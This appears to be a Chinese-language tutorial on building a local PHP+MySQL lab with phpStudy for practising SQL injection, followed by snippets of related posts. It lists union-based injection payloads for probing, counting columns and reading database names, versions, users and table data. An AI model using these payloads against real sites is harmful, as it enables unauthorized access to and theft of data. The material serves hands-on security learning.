php+mysql注入環境搭建需要資料如下:
1.安裝phpmystudy
自定義安裝好phpmystudy,啟動(執行phpmystudy)
在phpmystudy安裝路徑下www目錄建立一下資料夾test,
3.資料接受(建立資料庫,注入傳遞引數到資料庫)
使用者名稱密碼都是root
建立乙個表列資料,接受傳遞引數查詢資料庫。(我這裡直接下資料庫test下,建立一張biao表)
create table if not exists `biao` (
`id` int(10) not null,
`title` varchar(1000) not null,
`text` varchar(1000) not null
) engine=myisam default charset=gbk;
insert into `biao` (`id`, `title`, `text`) values
(1,'滲透注入','本地搭建注入環境')
好了,到此php+mysql注入環境搭建完成。
測試:
傳遞的引數?i=1
檢測是否有注入 :and 1=1正常 and 1=2不正常
猜解字段數: and 1=1 order by 3 (3正常,4不正常,欄位數為3)
猜解資料庫名:and 1=1 union select 1,2,3
獲取資料庫資訊:
資料庫名 database()
資料庫版本 version()
資料庫使用者 user()
作業系統 @@version_compile_os
得到資料庫為test,使用者為root,資料庫版本5.5.47
查詢test(使用小葵多功能轉換工具得到hex編碼)下的表名資訊:
查詢biao(使用小葵多功能轉換工具得到hex編碼)下的列名資訊:
直接獲取biao表名下的title列名的資料:
and 1=1 union select title,2,3 from test.biao
php mysql注入環境搭建
php mysql注入環境搭建需要資料如下 1.安裝phpmystudy 自定義安裝好phpmystudy,啟動 執行phpmystudy 在phpmystudy安裝路徑下www目錄建立一下資料夾test,3.資料接受 建立資料庫,注入傳遞引數到資料庫 使用者名稱密碼都是root 建立乙個表列資料,...
PHP mySQL環境一鍵搭建
最近的工作中經常涉及重複的填寫 內容大同小異,無非是編號的變化 部分內容的變化,有些東西是可以自動生成的,所以決定用php mysql實現這個小功能,每次只填寫必填項,就可以自動生成複雜的 當然第一步,需要搭建php和mysql環境。安裝完成後,會提示論壇賬號密碼和mysql賬號密碼,我們用到的只有...
SQL注入環境的搭建
使用phpstudy搭建sql注入環境 所用環境的 是乙個印度人的開源專案平台。裡面包含了基本的各種注入型別,同時又有get和post型別,以及一些基本的繞過學習。可以直接zip壓縮包好一點 3.sqli labs master解壓到你的phpstudy安裝目錄裡面的www目錄下 4.開啟sqli ...